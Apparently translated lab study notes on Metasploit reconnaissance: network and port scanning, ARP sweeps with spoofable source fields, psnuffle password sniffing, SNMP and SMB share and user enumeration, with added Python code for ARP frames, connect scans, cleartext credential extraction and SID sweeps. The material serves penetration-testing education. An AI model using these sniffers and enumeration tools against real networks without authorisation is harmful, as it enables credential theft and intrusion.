Cybersecurity study notes: information gathering with Metasploit
Collecting host information over TCP: using db_nmap and arp_sweep inside Metasploit
msfconsole ships a wrapper around nmap called db_nmap. It takes exactly the same arguments as nmap, and in addition stores the discovered hosts and services in the Metasploit database (so a database connection is required; check it with db_status). Example:
msf6 > db_nmap -sS 192.168.1.106     ### SYN scan, same as running nmap -sS 192.168.1.106 outside msfconsole
[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-03 16:12 CST
[*] Nmap: Nmap scan report for 192.168.1.106
[*] Nmap: Host is up (0.00019s latency).
[*] Nmap: Not shown: 995 closed tcp ports (reset)
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 22/tcp   open  ssh
[*] Nmap: 88/tcp   open  kerberos-sec
[*] Nmap: 3031/tcp open  eppc
[*] Nmap: 3283/tcp open  netassistant
[*] Nmap: 5900/tcp open  vnc
[*] Nmap: MAC Address: 78:4F:43:5A:47:FD (Apple)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
ARP scan
The arp_sweep module discovers live hosts by sending ARP requests and listening for replies. It only works on the local layer-2 segment (ARP is not routed) and needs root, because it writes raw frames and captures with pcap; in return it finds hosts that silently drop ICMP and TCP probes. The target answers to whatever sender address is in the request, which is what the SHOST and SMAC options control: fill in another host's IP/MAC and the replies go there instead of to you.
msf6 > use auxiliary/scanner/discovery/arp_sweep     ## load the ARP scanner from the auxiliary modules
msf6 auxiliary(scanner/discovery/arp_sweep) > show options     ## show the module's settings
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address     ### source IP, can be spoofed
   SMAC                        no        Source MAC Address    ### source MAC, can be spoofed
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24     ### the network to scan
RHOSTS => 192.168.1.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 10     ## number of threads
THREADS => 10
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS     192.168.1.0/24   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    10               yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.1.1 appears to be up (UNKNOWN).
[+] 192.168.1.103 appears to be up (UNKNOWN).
[+] 192.168.1.104 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/discovery/arp_sweep) > back
The value in parentheses is the NIC vendor looked up from the MAC's OUI prefix; UNKNOWN means the prefix was not in Metasploit's vendor table.
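To make concrete what arp_sweep puts on the wire, and what the SHOST/SMAC options change, here is an added example (not code from the article or from Metasploit) that builds the 42-byte Ethernet+ARP request frame, parses a reply, and expands an RHOSTS-style CIDR into the target list. The MAC and IP addresses are taken from the transcripts above purely as sample values; sending the frame needs a raw AF_PACKET socket on Linux as root, which is shown only as a comment so the module runs offline.

```python
import ipaddress
import socket
import struct

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    """'78:4f:43:5a:47:fd' -> 6 raw bytes."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC: {mac}")
    return bytes(int(p, 16) for p in parts)


def build_arp_request(sender_mac: str, sender_ip: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP who-has request (14 + 28 = 42 bytes).

    sender_mac / sender_ip are what the module's SMAC / SHOST options set:
    the target answers to whatever sender address is in the request, so a
    spoofed value makes its reply go to that host instead of to us.
    """
    eth_hdr = mac_bytes(BROADCAST_MAC) + mac_bytes(sender_mac) + struct.pack("!H", 0x0806)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,                          # HTYPE: Ethernet
        0x0800,                     # PTYPE: IPv4
        6, 4,                       # HLEN, PLEN
        1,                          # OPER: 1 = request, 2 = reply
        mac_bytes(sender_mac),
        socket.inet_aton(sender_ip),
        b"\x00" * 6,                # target MAC: unknown, that is the question
        socket.inet_aton(target_ip),
    )
    return eth_hdr + arp


def parse_arp_reply(frame: bytes):
    """Return (sender_mac, sender_ip) from an ARP reply frame, or None for anything else."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    oper = struct.unpack("!H", frame[20:22])[0]
    if oper != 2:
        return None
    sha = ":".join(f"{b:02x}" for b in frame[22:28])
    spa = socket.inet_ntoa(frame[28:32])
    return sha, spa


def sweep_targets(cidr: str):
    """Yield every host address of a network, like RHOSTS 192.168.1.0/24."""
    for host in ipaddress.ip_network(cidr, strict=False).hosts():
        yield str(host)


if __name__ == "__main__":
    # Sending needs a raw packet socket bound to the interface (Linux, root):
    #   s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0806))
    #   s.bind(("eth0", 0))
    #   for ip in sweep_targets("192.168.1.0/24"):
    #       s.send(build_arp_request("78:4f:43:5a:47:fd", "192.168.1.188", ip))
    #   then read replies from s and feed them to parse_arp_reply().
    frame = build_arp_request("78:4f:43:5a:47:fd", "192.168.1.188", "192.168.1.1")
    print(len(frame), frame.hex())
```

The sender fields sit at bytes 22-31 of the frame; that is the only place a spoofed SHOST/SMAC changes anything, which is why the sweep itself still works with them set but the answers arrive somewhere else.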
Scanning TCP ports with the portscan modules
msf6 > search portscan
Matching Modules
================
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner          ## scan through a third-party FTP server
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner         ## ACK scan, maps firewall rules
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner                 ## full TCP connect scan
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner             ## half-open (SYN) scan
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
The half-open scanner is auxiliary/scanner/portscan/syn: it sends raw SYN packets and reads the SYN/ACK or RST replies with pcap, so it must run as root and never completes a handshake. The transcript below actually uses auxiliary/scanner/portscan/tcp, the full-connect scanner (the prompt and the CONCURRENCY/DELAY/JITTER/TIMEOUT options shown belong to that module, not to syn). A connect scan needs no privileges but completes the three-way handshake on every open port, so it shows up in the target's service logs.
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/portscan/tcp) > exploit
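The connect scanner above is simple enough to rebuild, and doing so shows why its three outcomes differ from a SYN scan's. The following is an added example, not code from the article or from Metasploit: it expands a PORTS-style spec, probes each port with a full connect using the module's CONCURRENCY and TIMEOUT semantics, and classifies a refused connection (RST) as closed and a timeout (dropped SYN) as filtered. The usage under __main__ scans the local host so it runs without a lab network.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_ports(spec: str):
    """Expand a PORTS-style spec such as '22-25,80,110-900' into a sorted list."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(part))
    return sorted(p for p in ports if 0 < p < 65536)


def probe(host: str, port: int, timeout_ms: int = 1000) -> str:
    """Full TCP connect to one port. Returns 'open', 'closed' or 'filtered'.

    A refused connection means the host answered our SYN with RST (closed).
    No answer within the timeout means something dropped the SYN (filtered),
    which is the case a SYN scan also cannot tell apart from a slow host.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout_ms / 1000.0)
    try:
        s.connect((host, port))      # completes the handshake: visible in service logs
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:                  # includes socket.timeout / TimeoutError
        return "filtered"
    finally:
        s.close()


def connect_scan(host: str, ports_spec: str, concurrency: int = 10, timeout_ms: int = 1000):
    """Scan one host with `concurrency` ports in flight, like CONCURRENCY in portscan/tcp."""
    ports = parse_ports(ports_spec)
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        results = dict(pool.map(lambda p: (p, probe(host, p, timeout_ms)), ports))
    return results


def open_ports(host: str, ports_spec: str, **kw):
    """Just the open ports, sorted, which is what the module prints."""
    return sorted(p for p, st in connect_scan(host, ports_spec, **kw).items() if st == "open")


if __name__ == "__main__":
    # Constructed example against the local host; no target network needed.
    for port, state in sorted(connect_scan("127.0.0.1", "22,80,443,8080").items()):
        print(f"{port}/tcp {state}")
```

Against a remote network the filtered case is the one to watch: a long list of "filtered" ports usually means a firewall, and raising CONCURRENCY does not help because every probe waits the full TIMEOUT.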
Sniffing passwords with the psnuffle module under auxiliary/sniffer
How it works: the module captures the authentication exchange of common cleartext protocols (FTP, IMAP, POP3, SMB and HTTP URLs) and records the user name and password. It only sees traffic that reaches the capture interface, so on a switched network you have to be on the path (a mirror port, the gateway, or ARP spoofing); the PCAPFILE option lets you run the same parsers over an existing capture instead of a live interface.
Procedure
From a second terminal, log in to the FTP service on the target with lftp, so that there is a login for the sniffer to catch:
┌──(root㉿kali)-[~]
└─# lftp -u msfadmin:msfadmin 192.168.1.102 -p 21
msf6 > use auxiliary/sniffer/psnuffle
msf6 auxiliary(sniffer/psnuffle) > info     ## show the module's information
       Name: pSnuffle Packet Sniffer
     Module: auxiliary/sniffer/psnuffle
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Max Moser <mmo@remote-exploit.org>
Available actions:     ### actions the module can run
  Name     Description
  ----     -----------
  List     List protocols     ### list the supported protocols
  Sniffer  Run sniffer        ### run the sniffer
Check supported:
  No
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILTER                      no        The filter string for capturing traffic
  INTERFACE                   no        The name of the interface
  PCAPFILE                    no        The name of the PCAP capture file to process
  PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
  SNAPLEN    65535            yes       The number of bytes to capture
  TIMEOUT    500              yes       The number of seconds to wait for new data
Description:
  This module sniffs passwords like dsniff did in the past
## psnuffle does what the old dsniff tool did: it pulls credentials out of cleartext protocols. The parsers it ships are exactly those printed by the List action below (ftp, imap, pop3, smb, url).
## dsniff is a well-known network sniffing toolkit whose main use was sniffing passwords from cleartext protocols.
View the full module info with the info -d command.
msf6 auxiliary(sniffer/psnuffle) > list
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Protocols: ftp, imap, pop3, smb, url
[*] Auxiliary module execution completed
msf6 auxiliary(sniffer/psnuffle) > sniffer
[*] Successful FTP Login: 192.168.1.188:52004-192.168.1.102:21 >> msfadmin / msfadmin     ## the FTP user name and password captured from the login
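What the FTP/POP3/IMAP/URL parsers inside psnuffle actually look for is a handful of line patterns on the client side of the connection. The following added example (not the article's or Metasploit's code) reimplements that idea over reassembled client-to-server text: USER/PASS pairs for FTP and POP3, the tagged LOGIN command for IMAP, and HTTP Basic credentials. The sample streams at the bottom are constructed, not captured from the lab network, and the port-to-protocol mapping is the usual default ports, which is an assumption a real sniffer would refine from the traffic itself.

```python
import base64
import re


def sniff_ftp_pop3(stream: str):
    """FTP and POP3 authenticate with a 'USER <name>' line followed by 'PASS <secret>'."""
    creds = []
    user = None
    for line in stream.splitlines():
        m = re.match(r"(?i)^USER\s+(\S+)", line)
        if m:
            user = m.group(1)
            continue
        m = re.match(r"(?i)^PASS\s+(.*)$", line)
        if m and user is not None:
            creds.append((user, m.group(1)))
            user = None
    return creds


def sniff_imap(stream: str):
    """IMAP: '<tag> LOGIN <user> <pass>' where the arguments may be quoted."""
    creds = []
    for line in stream.splitlines():
        m = re.match(r'^\S+\s+LOGIN\s+("?)([^"\s]+)\1\s+("?)([^"\s]+)\3', line, re.I)
        if m:
            creds.append((m.group(2), m.group(4)))
    return creds


def sniff_http_basic(stream: str):
    """HTTP: 'Authorization: Basic base64(user:pass)' travels in the clear over plain HTTP."""
    creds = []
    for m in re.finditer(r"(?im)^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", stream):
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:
            continue
        user, _, pw = decoded.partition(":")
        creds.append((user, pw))
    return creds


def sniff_all(client_streams):
    """client_streams: list of (destination port, client->server text).
    Returns [(protocol, user, password), ...] in the order seen."""
    found = []
    for port, text in client_streams:
        if port in (21, 110):                       # assumption: default FTP / POP3 ports
            proto = "ftp" if port == 21 else "pop3"
            found += [(proto, u, p) for u, p in sniff_ftp_pop3(text)]
        elif port == 143:
            found += [("imap", u, p) for u, p in sniff_imap(text)]
        elif port in (80, 8080):
            found += [("http", u, p) for u, p in sniff_http_basic(text)]
    return found


# Constructed sample client streams (not captured from the lab network).
SAMPLE_STREAMS = [
    (21, "USER msfadmin\r\nPASS msfadmin\r\nSYST\r\n"),
    (110, "USER alice\r\nPASS s3cret\r\nLIST\r\n"),
    (143, 'a001 LOGIN "bob" "hunter2"\r\n'),
    (80, "GET / HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n"),
]

if __name__ == "__main__":
    for proto, user, pw in sniff_all(SAMPLE_STREAMS):
        print(f"[+] Successful {proto.upper()} login >> {user} / {pw}")
```

The code deliberately ignores the server side: the credentials are in the client's commands, and a sniffer never needs to decrypt anything here because these protocols send them as plain text, which is the whole point the module demonstrates.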
Collecting information over SNMP
The snmpd service on the target (Metasploitable) has to be reconfigured first, because by default it only listens on the loopback address and is not reachable from the network:
root@metasploitable:~# vim /etc/default/snmpd
Find this line:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
The trailing address is where snmpd listens. Change 127.0.0.1 to 0.0.0.0 so it listens on all interfaces:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0'
Save, exit, and restart snmpd:
root@metasploitable:~# /etc/init.d/snmpd restart
Restarting network management services: snmpd.
root@metasploitable:~#
Hands-on: enumerating a target over SNMP with the snmp_enum module
snmp_enum is a capable SNMP enumeration tool: given a community string the agent accepts (the default is "public", which is also the factory default on many devices), it walks the system, network, software and hardware parts of the MIB and reports everything it gets back. With SNMP v1/v2c the community string is the only authentication there is and it travels in cleartext.
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > info
       Name: SNMP Enumeration Module
     Module: auxiliary/scanner/snmp/snmp_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Matteo Cantoni <goony@nothink.org>
Check supported:
  No
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      161              yes       The target port (UDP)
  THREADS    1                yes       The number of concurrent threads (max one per host)
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    1                yes       SNMP Version <1/2c>
Description:
  This module allows enumeration of any devices with SNMP protocol
  support. It supports hardware, software, and network information.
  The default community used is "public".
References:
  https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
  https://net-snmp.sourceforge.io/docs/man/snmpwalk.html
  http://www.nothink.org/codes/snmpcheck/index.php
View the full module info with the info -d command.
msf6 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
(screenshot of the module's output: https://i-blog.csdnimg.cn/blog_migrate/0bf4d8326b56212ad9b0498d8475bbaf.png)
Extension
Other useful SNMP enumeration tools
SNMP enumeration tool: snmpwalk
snmpwalk is an SNMP application from the net-snmp suite. It issues SNMP GETNEXT requests repeatedly to retrieve every object below the specified OID (object identifier) in the MIB tree and prints them. Commonly used options:
1. General options
a) -h            show help
b) -v 1|2c|3     SNMP protocol version
c) -V            show the snmpwalk version
d) -r RETRIES    number of retries per request (net-snmp's default is 5)
e) -t TIMEOUT    timeout per request in seconds (net-snmp's default is 1)
f) -Cc           do not check whether returned OIDs are increasing while walking (by default the walk stops with an error when an agent returns a non-increasing OID)
2. v1/v2c options
a) -c COMMUNITY  community string; the only credential these versions have, sent in cleartext
3. v3 options
a) -l LEVEL      security level: noAuthNoPriv|authNoPriv|authPriv
b) -u USER-NAME  security name (user)
c) -a PROTOCOL   authentication protocol: MD5|SHA; needed only when -l is authNoPriv or authPriv
d) -A PASSPHRASE authentication passphrase; needed only when -l is authNoPriv or authPriv
e) -x PROTOCOL   privacy (encryption) protocol: DES|AES; needed only when -l is authPriv
f) -X PASSPHRASE privacy passphrase; needed only when -l is authPriv
SNMP enumeration tool: snmpcheck (by the same author as snmp_enum; see the module's references above)
Collecting information over SMB
SMB overview: Server Message Block (SMB), whose SMB1 dialect is also known as CIFS (Common Internet File System), is an application-layer network protocol developed primarily by Microsoft. Its main purpose is to let machines on a network share files, printers, serial ports and inter-process communication (named pipes) with each other.
Samba, an open-source reimplementation for Unix-like systems, lets Unix servers interoperate with Windows clients for file and print sharing; it is the implementation running on the Metasploitable target below.
Fingerprinting the SMB version with smb_version
msf6 > search smb_version
Matching Modules
================
   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
msf6 > use 0
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   THREADS  1                yes       The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
### Note: to scan several targets, separate them with a comma followed by a space; RHOSTS also accepts CIDR ranges (192.168.1.0/24) and a file of targets (file:/path/to/list).
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.102, 192.168.1.97
rhosts => 192.168.1.102, 192.168.1.97
msf6 auxiliary(scanner/smb/smb_version) > exploit
[*] 192.168.1.102:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.1.102:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] Scanned 1 of 2 hosts (50% complete)
[*] 192.168.1.97:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (guid:{528e1363-aea8-895a-94a1-b960f94f7bf5}) (authentication domain:MACBOOK-PRO)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
Reading the result: the Metasploitable host only speaks SMB1 (Samba 3.0.20) with message signing optional, which is what makes SMB relay and tampering possible; the macOS host negotiates SMB 2/3 with signing required. The "Host could not be identified" line just means the module has no OS fingerprint for that Samba string; the version itself is still reported.
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/97da11cda1829a47b7d59b0987ea09db.png)
Enumerating shares over SMB with smb_enumshares (with an account and password)
Almost all of the SMB modules accept a user name and password (SMBUser/SMBPass). With credentials configured, some modules return far more complete results than an anonymous (null) session does, such as non-default shares and, with SpiderShares, their contents.
(screenshots: https://i-blog.csdnimg.cn/blog_migrate/f3affddeb9d5cc6e31d29d4295fe4051.png
https://i-blog.csdnimg.cn/blog_migrate/4c9a68f389ae8c5d659d38c82484b9ab.png
https://i-blog.csdnimg.cn/blog_migrate/637d2c9523ec918df0e1a9ac853ea4f2.png)
msf6 > search enumshares
Matching Modules
================
   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_enumshares                       normal  No     SMB Share Enumeration
   1  auxiliary/scanner/snmp/snmp_enumshares                     normal  No     SNMP Windows SMB Share Enumeration
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/snmp/snmp_enumshares
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > show options
Module options (auxiliary/scanner/smb/smb_enumshares):
   Name                    Current Setting                         Required  Description
   ----                    ---------------                         --------  -----------
   HIGHLIGHT_NAME_PATTERN  username|password|user|pass|Groups.xml  yes       PCRE regex of resource names to highlight
   LogSpider               3                                       no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
   MaxDepth                999                                     yes       Max number of subdirectories to spider
   RHOSTS                                                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SMBDomain               .                                       no        The Windows domain to use for authentication
   SMBPass                                                         no        The password for the specified username
   SMBUser                                                         no        The username to authenticate as
   Share                                                           no        Show only the specified share
   ShowFiles               false                                   yes       Show detailed information when spidering
   SpiderProfiles          true                                    no        Spider only user profiles when share is a disk share
   SpiderShares            false                                   no        Spider shares recursively
   THREADS                 1                                       yes       The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.1.89
rhosts => 192.168.1.89
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMBuser chao
SMBuser => chao
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_enumshares) > exploit
[*] 192.168.1.89:139 - Starting module
[-] 192.168.1.89:139 - Login Failed: The SMB server did not reply to our request
[*] 192.168.1.89:445 - Starting module
[!] 192.168.1.89:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 192.168.1.89:445 - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 192.168.1.89:445 - ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] 192.168.1.89:445 - C$ - (DISK|SPECIAL) Default share
[+] 192.168.1.89:445 - IPC$ - (IPC|SPECIAL) Remote IPC
[+] 192.168.1.89:445 - Users - (DISK)
[+] 192.168.1.89:445 - wangdada - (DISK)
[*] 192.168.1.89: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#### wangdada is the share we created earlier on the Windows host; ADMIN$, C$ and IPC$ are the hidden administrative shares Windows creates by default (the trailing $ hides them from browsing), and Users is a plain disk share. The failure on port 139 is expected, since the host only serves SMB on 445, and the two [!] lines only say that the OS and LAN Manager strings are not available once SMB1 is disabled.
Enumerating system users with smb_lookupsid (SID enumeration)
On the Windows target (Windows 10 in this lab) create a test user:
right-click This PC → Manage → Local Users and Groups → Users, right-click in the empty area and choose New User
User: admin    Password: 123456
Set the admin user's properties as shown in the screenshot:
(screenshot: https://i-blog.csdnimg.cn/blog_migrate/8ef0ad5af9c43459ba1da007644873b3.png)
msf6 > search smb_lookupsid
Matching Modules
================
   #  Name                                                   Disclosure Date  Rank    Check  Description
   -  ----                                                   ---------------  ----    -----  -----------
   0  auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal  No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   1  auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal  No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   2  auxiliary/scanner/smb/smb_lookupsid                                     normal  No     SMB SID User Enumeration (LookupSid)
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/smb/smb_lookupsid
msf6 > use auxiliary/scanner/smb/smb_lookupsid
msf6 auxiliary(scanner/smb/smb_lookupsid) > show options
Module options (auxiliary/scanner/smb/smb_lookupsid):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MaxRID     4000             no        Maximum RID to check
   MinRID     500              no        Starting RID to check
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)
Auxiliary action:
   Name   Description
   ----   -----------
   LOCAL  Enumerate local accounts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_lookupsid) > set rhosts 192.168.1.89
rhosts => 192.168.1.89
msf6 auxiliary(scanner/smb/smb_lookupsid) > set smbuser admin
smbuser => admin
msf6 auxiliary(scanner/smb/smb_lookupsid) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_lookupsid) > exploit
[*] 192.168.1.89:445 - PIPE(LSARPC) LOCAL(DESKTOP-2T86P3T - 5-21-2620834448-3206096960-2066338221) DOMAIN(WORKGROUP - )
[*] 192.168.1.89:445 - USER=Administrator RID=500
[*] 192.168.1.89:445 - USER=Guest RID=501
[*] 192.168.1.89:445 - USER=DefaultAccount RID=503
[*] 192.168.1.89:445 - USER=WDAGUtilityAccount RID=504
[*] 192.168.1.89:445 - GROUP=None RID=513
[*] 192.168.1.89:445 - USER=chao RID=1001
[*] 192.168.1.89:445 - USER=admin RID=1002
[*] 192.168.1.89:445 - DESKTOP-2T86P3T
[*] 192.168.1.89: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
How to read this: the module opens the LSARPC named pipe over SMB, asks for the machine's SID (S-1-5-21-2620834448-3206096960-2066338221), and then asks LSA to resolve every SID built from that prefix plus a RID from MinRID to MaxRID. RIDs 500 to 504 are built-in accounts present on every Windows install; chao (1001) and admin (1002) are the locally created accounts, and the RID order tells you which was created first. Widen MaxRID if a host is expected to have many accounts.
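The sweep above works because a Windows account SID is simply the machine (or domain) SID with the RID appended, so the candidate list can be generated without asking the target anything. The added example below (not the article's or Metasploit's code) shows the binary SID layout that travels in the LSARPC request, converts it both ways, splits a resolved SID into domain part and RID, and generates the MinRID..MaxRID candidates; the machine SID and the RID table are the values from the transcript above, used as sample data.

```python
import struct


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-A-B-C-500' -> binary SID: revision, sub-authority count,
    6-byte big-endian identifier authority, then little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    if parts[0].upper() != "S" or len(parts) < 3:
        raise ValueError(f"bad SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(raw: bytes) -> str:
    revision, count = struct.unpack_from("<BB", raw, 0)
    if len(raw) < 8 + 4 * count:
        raise ValueError("truncated SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<" + "I" * count, raw, 8)
    return f"S-{revision}-{authority}" + "".join(f"-{s}" for s in subs)


def split_rid(sid: str):
    """Separate an account SID into (domain/machine SID, RID)."""
    base, _, rid = sid.rpartition("-")
    return base, int(rid)


def candidate_sids(domain_sid: str, min_rid: int = 500, max_rid: int = 4000):
    """The SIDs smb_lookupsid asks LSA to resolve, one per RID in MinRID..MaxRID."""
    for rid in range(min_rid, max_rid + 1):
        yield f"{domain_sid}-{rid}"


# RIDs every Windows install has, as seen in the lookup output above.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 503: "DefaultAccount",
                   504: "WDAGUtilityAccount", 513: "None (Domain Users in a domain)"}


def classify(rid: int) -> str:
    """Built-in RIDs are fixed; locally created accounts are numbered from 1000 upward."""
    if rid in WELL_KNOWN_RIDS:
        return f"built-in ({WELL_KNOWN_RIDS[rid]})"
    return "created account" if rid >= 1000 else "reserved"


if __name__ == "__main__":
    machine = "S-1-5-21-2620834448-3206096960-2066338221"   # sample value from the lab output
    raw = sid_to_bytes(machine + "-1002")
    print(raw.hex(), sid_from_bytes(raw))
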